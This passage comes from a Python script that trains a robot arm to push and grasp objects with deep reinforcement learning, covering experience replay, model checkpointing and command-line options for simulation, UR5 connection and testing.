sample_depth_heightmap = sample_depth_heightmap.astype(np.float32)/100000
# Compute forward pass with sample
sample_push_predictions, sample_grasp_predictions, sample_state_feat = trainer.forward(sample_color_heightmap, sample_depth_heightmap, is_volatile=True)
# Load next sample RGB-D heightmap
next_sample_color_heightmap = cv2.imread(os.path.join(logger.mask_color_heightmaps_directory, '%06d.0.color.png' % (sample_iteration+1)))
next_sample_color_heightmap = cv2.cvtColor(next_sample_color_heightmap, cv2.COLOR_BGR2RGB)
next_sample_depth_heightmap = cv2.imread(os.path.join(logger.mask_depth_heightmaps_directory, '%06d.0.depth.png' % (sample_iteration+1)), -1)
next_sample_depth_heightmap = next_sample_depth_heightmap.astype(np.float32)/100000
sample_push_success = sample_reward_value == 0.5
sample_grasp_success = sample_reward_value == 1
sample_change_detected = sample_push_success
new_sample_label_value, _ = trainer.get_label_value(sample_primitive_action, sample_push_success, sample_grasp_success, sample_change_detected, sample_push_predictions, sample_grasp_predictions, next_sample_color_heightmap, next_sample_depth_heightmap)
# Get labels for sample and backpropagate
sample_best_pix_ind = (np.asarray(trainer.executed_action_log)[sample_iteration,1:4]).astype(int)
trainer.backprop(sample_color_heightmap, sample_depth_heightmap, sample_primitive_action, sample_best_pix_ind, trainer.label_value_log[sample_iteration])
# Recompute prediction value and label for replay buffer
if sample_primitive_action == 'push':
trainer.predicted_value_log[sample_iteration] = [np.max(sample_push_predictions)]
# trainer.label_value_log[sample_iteration] = [new_sample_label_value]
elif sample_primitive_action == 'grasp':
trainer.predicted_value_log[sample_iteration] = [np.max(sample_grasp_predictions)]
# trainer.label_value_log[sample_iteration] = [new_sample_label_value]
else:
print('Not enough prior training samples. Skipping experience replay.')
# Save model snapshot
if not is_testing:
logger.save_backup_model(trainer.model, method)
if trainer.iteration % 10 == 0:
logger.save_model(trainer.iteration, trainer.model, method)
if trainer.use_cuda:
trainer.model = trainer.model.cuda()
# Sync both action thread and training thread
while nonlocal_variables['executing_action']:
time.sleep(0.01)
if exit_called:
break
# Save information for next training step
prev_color_img = color_img.copy()
prev_depth_img = depth_img.copy()
prev_color_heightmap = mask_color_heightmap.copy()
prev_depth_heightmap = valid_mask_depth_heightmap.copy()
prev_valid_depth_heightmap = valid_depth_heightmap.copy()
prev_push_success = nonlocal_variables['push_success']
prev_grasp_success = nonlocal_variables['grasp_success']
prev_primitive_action = nonlocal_variables['primitive_action']
prev_push_predictions = push_predictions.copy()
prev_grasp_predictions = grasp_predictions.copy()
prev_best_pix_ind = nonlocal_variables['best_pix_ind']
trainer.iteration += 1
iteration_time_1 = time.time()
print('##### Time elapsed: %f ##### \n' % (iteration_time_1-iteration_time_0))
if __name__ == '__main__':
# Parse arguments
parser = argparse.ArgumentParser(description='Train robotic agents to learn how to plan complementary pushing and grasping actions for manipulation with deep reinforcement learning in PyTorch.')
# --------------- Setup options ---------------
parser.add_argument('--is_sim', dest='is_sim', action='store_true', default=False, help='run in simulation?')
parser.add_argument('--obj_mesh_dir', dest='obj_mesh_dir', action='store', default='objects/blocks', help='directory containing 3D mesh files (.obj) of objects to be added to simulation')
parser.add_argument('--num_obj', dest='num_obj', type=int, action='store', default=10, help='number of objects to add to simulation')
parser.add_argument('--tcp_host_ip', dest='tcp_host_ip', action='store', default='100.127.7.223', help='IP address to robot arm as TCP client (UR5)')
parser.add_argument('--tcp_port', dest='tcp_port', type=int, action='store', default=30002, help='port to robot arm as TCP client (UR5)')
parser.add_argument('--rtc_host_ip', dest='rtc_host_ip', action='store', default='100.127.7.223', help='IP address to robot arm as real-time client (UR5)')
parser.add_argument('--rtc_port', dest='rtc_port', type=int, action='store', default=30003, help='port to robot arm as real-time client (UR5)')
parser.add_argument('--heightmap_resolution', dest='heightmap_resolution', type=float, action='store', default=0.002, help='meters per pixel of heightmap')
parser.add_argument('--random_seed', dest='random_seed', type=int, action='store', default=1234, help='random seed for simulation and neural net initialization')
parser.add_argument('--cpu', dest='force_cpu', action='store_true', default=False, help='force code to run in CPU mode')
# ------------- Algorithm options -------------
parser.add_argument('--method', dest='method', action='store', default='reinforcement', help='set to \'reactive\' (supervised learning) or \'reinforcement\' (reinforcement learning ie Q-learning)')
parser.add_argument('--push_rewards', dest='push_rewards', action='store_true', default=False, help='use immediate rewards (from change detection) for pushing?')
parser.add_argument('--future_reward_discount', dest='future_reward_discount', type=float, action='store', default=0.5)
parser.add_argument('--experience_replay', dest='experience_replay', action='store_true', default=False, help='use prioritized experience replay?')
parser.add_argument('--heuristic_bootstrap', dest='heuristic_bootstrap', action='store_true', default=False, help='use handcrafted grasping algorithm when grasping fails too many times in a row during training?')
parser.add_argument('--explore_rate_decay', dest='explore_rate_decay', action='store_true', default=False)
parser.add_argument('--grasp_only', dest='grasp_only', action='store_true', default=False)
# -------------- Testing options --------------
parser.add_argument('--is_testing', dest='is_testing', action='store_true', default=False)
parser.add_argument('--max_test_trials', dest='max_test_trials', type=int, action='store', default=30, help='maximum number of test runs per case/scenario')
parser.add_argument('--test_preset_cases', dest='test_preset_cases', action='store_true', default=False)
parser.add_argument('--test_preset_file', dest='test_preset_file', action='store', default='test-10-obj-01.txt')
# ------ Pre-loading and logging options ------
parser.add_argument('--load_snapshot', dest='load_snapshot', action='store_true', default=False, help='load pre-trained snapshot of model?')
parser.add_argument('--snapshot_file', dest='snapshot_file', action='store') # snapshot_file: logs/~/model/snapshot-backup.reinforcement.pth
parser.add_argument('--continue_logging', dest='continue_logging', action='store_true', default=False, help='continue logging from previous session?')
parser.add_argument('--logging_directory', dest='logging_directory', action='store') #logging_directory = "/home/geonhee-ml/ur_ws/src/visual-pushing-grasping/logs/2019-10-22.15:44:06/"
parser.add_argument('--save_visualizations', dest='save_visualizations', action='store_true', default=False, help='save visualizations of FCN predictions?')
# Run main program with specified arguments
args = parser.parse_args()
main(args)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.